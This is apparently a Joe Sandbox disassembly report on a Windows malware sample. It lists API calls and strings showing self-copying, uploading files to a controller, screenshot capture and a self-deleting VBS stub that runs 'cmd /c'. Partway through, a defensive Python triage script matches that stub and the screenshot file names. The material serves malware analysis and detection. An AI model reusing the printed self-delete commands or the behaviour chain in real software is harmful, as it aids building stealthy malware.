                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000001,0040764D,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000003,00407675,Pj,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                • API String ID: 1646373207-948601862
                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID: H%j
                                • API String ID: 3899193279-3294387659
                                • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcslen.LIBCMT ref: 0040CE07
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                • _wcslen.LIBCMT ref: 0040CEE6
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000000,00000000), ref: 0040CF84
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                • _wcslen.LIBCMT ref: 0040CFC6
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                • ExitProcess.KERNEL32 ref: 0040D062
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                • String ID: 6$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Pj$del$hdF$open
                                • API String ID: 1579085052-508949556
                                • Opcode ID: 4f87b9d86e0d177ce47a61f674f44f3f48b1c9db7a96dc1323a3ea9f6ed17011
                                • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                • Opcode Fuzzy Hash: 4f87b9d86e0d177ce47a61f674f44f3f48b1c9db7a96dc1323a3ea9f6ed17011
                                • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                • API String ID: 3941738427-1684325040
                                • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                • API String ID: 1223786279-2576077980
                                • Opcode ID: fefa4fcaff023c9353dc8b0fd495dc9a770faaa34131ddf1702c86cb89b9f2bb
                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                • Opcode Fuzzy Hash: fefa4fcaff023c9353dc8b0fd495dc9a770faaa34131ddf1702c86cb89b9f2bb
                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $hdF$NG
                                • API String ID: 3086580692-1206044436
                                • Opcode ID: b6e4bd62b45e46aa0739a220c33f254e66673dd9c381c7277475c2bc153b6db5
                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                • Opcode Fuzzy Hash: b6e4bd62b45e46aa0739a220c33f254e66673dd9c381c7277475c2bc153b6db5
                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00419FB9
                                • GdiplusStartup.GDIPLUS(po,?,00000000), ref: 00419FEB
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                • GetLocalTime.KERNEL32(?), ref: 0041A105
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG$po
                                • API String ID: 489098229-3302684940
                                • Opcode ID: 74d135751b3a5a5dd2f0b0327ce2346d099fb9b4d0bdba82b7b527c99728bf6f
                                • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                • Opcode Fuzzy Hash: 74d135751b3a5a5dd2f0b0327ce2346d099fb9b4d0bdba82b7b527c99728bf6f
                                • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$hdF$open
                                • API String ID: 1913171305-51354631
                                • Opcode ID: ffab9c29fb179e10320a649d4d553e654e50398e427ab27dc765951fe3090336
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: ffab9c29fb179e10320a649d4d553e654e50398e427ab27dc765951fe3090336
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                Uniqueness

                                Uniqueness Score: -1.00%
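The screenshot routine at 00419FB9 (GdiplusStartup, CreateDirectoryW, GetLocalTime, name formats time_%04i%02i%02i_%02i%02i%02i and wnd_%04i%02i%02i_%02i%02i%02i) and the self-delete routine at 0040D859 (drops a .vbs under Temp that runs `cmd /c` and then deletes itself with Scripting.FileSystemObject, launched via ShellExecuteW "open" before ExitProcess) both leave checkable artifacts on a host. The Python below is an added example written for this page, not code from Joe Sandbox or recovered from the sample. It uses only the literal strings shown in the two String ID fields; the screenshot file extension is not visible in the report and is treated as optional, and the stub text, paths and file names it embeds are constructed for the demo.

```python
"""Triage helper for two on-disk artifacts of the analysed sample: the self-deleting
.vbs stub dropped in Temp and the timestamped capture files written by the screenshot
routine. Added example for this report page, not the sandbox's or the sample's code."""
import re
from pathlib import Path, PureWindowsPath
from typing import Dict, Iterable, List, Tuple

# Literal strings from the String ID field of the self-delete function (0040D859..0040D9C4).
VBS_SELF_DELETE_MARKERS = (
    'CreateObject("WScript.Shell").Run "cmd /c ""',
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)',
)

# Format strings from the screenshot function (00419FB9): time_%04i%02i%02i_%02i%02i%02i and
# wnd_%04i%02i%02i_%02i%02i%02i. The extension is not shown in the report, so it is optional
# here (assumption).
CAPTURE_NAME_RE = re.compile(r"^(?:time|wnd)_\d{8}_\d{6}(?:\.[A-Za-z0-9]+)?$")


def is_self_delete_stub(script_text: str) -> bool:
    """True when a script carries both the cmd /c launcher and the self-delete line."""
    return all(marker in script_text for marker in VBS_SELF_DELETE_MARKERS)


def is_capture_artifact_name(filename: str) -> bool:
    """True for a base name matching the time_/wnd_ timestamp scheme."""
    return CAPTURE_NAME_RE.match(PureWindowsPath(filename).name) is not None


def triage(entries: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Classify (path, content) pairs. Content may be '' for files that are not scripts."""
    hits: Dict[str, List[str]] = {"self_delete_vbs": [], "capture_artifacts": []}
    for path, content in entries:
        if path.lower().endswith(".vbs") and is_self_delete_stub(content):
            hits["self_delete_vbs"].append(path)
        if is_capture_artifact_name(path):
            hits["capture_artifacts"].append(path)
    return hits


def scan_directory(root: Path) -> Dict[str, List[str]]:
    """Filesystem wrapper around triage(): reads .vbs bodies, checks names for everything else."""
    def entries():
        for p in root.rglob("*"):
            if not p.is_file():
                continue
            text = ""
            if p.suffix.lower() == ".vbs":
                text = p.read_text(encoding="utf-8", errors="replace")
            yield str(p), text
    return triage(entries())


# Constructed sample input (not taken from the sandbox run). The stub is shaped like the one
# the strings above describe; the quoted payload path is a placeholder.
SAMPLE_STUB = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\victim\\AppData\\Local\\Temp\\install.bat""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
SAMPLE_ENTRIES = [
    ("C:\\Users\\victim\\AppData\\Local\\Temp\\install.vbs", SAMPLE_STUB),
    ("C:\\Users\\victim\\AppData\\Local\\Temp\\benign.vbs", 'MsgBox "hello"'),
    ("C:\\Users\\victim\\Pictures\\time_20240503_142501.jpg", ""),
    ("C:\\Users\\victim\\Pictures\\readme.txt", ""),
]

if __name__ == "__main__":
    for category, paths in triage(SAMPLE_ENTRIES).items():
        print(category, paths)
```

Run `scan_directory(Path(r"C:\Users\<user>\AppData\Local\Temp"))` on a live host to check for the stub; because the sample deletes the .vbs after it runs, a hit there usually means the cleanup failed or the script is still queued, so pair the check with a search for the capture names under the user profile.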

                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$getaddrinfo
                                • API String ID: 2490988753-3078833738
                                • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
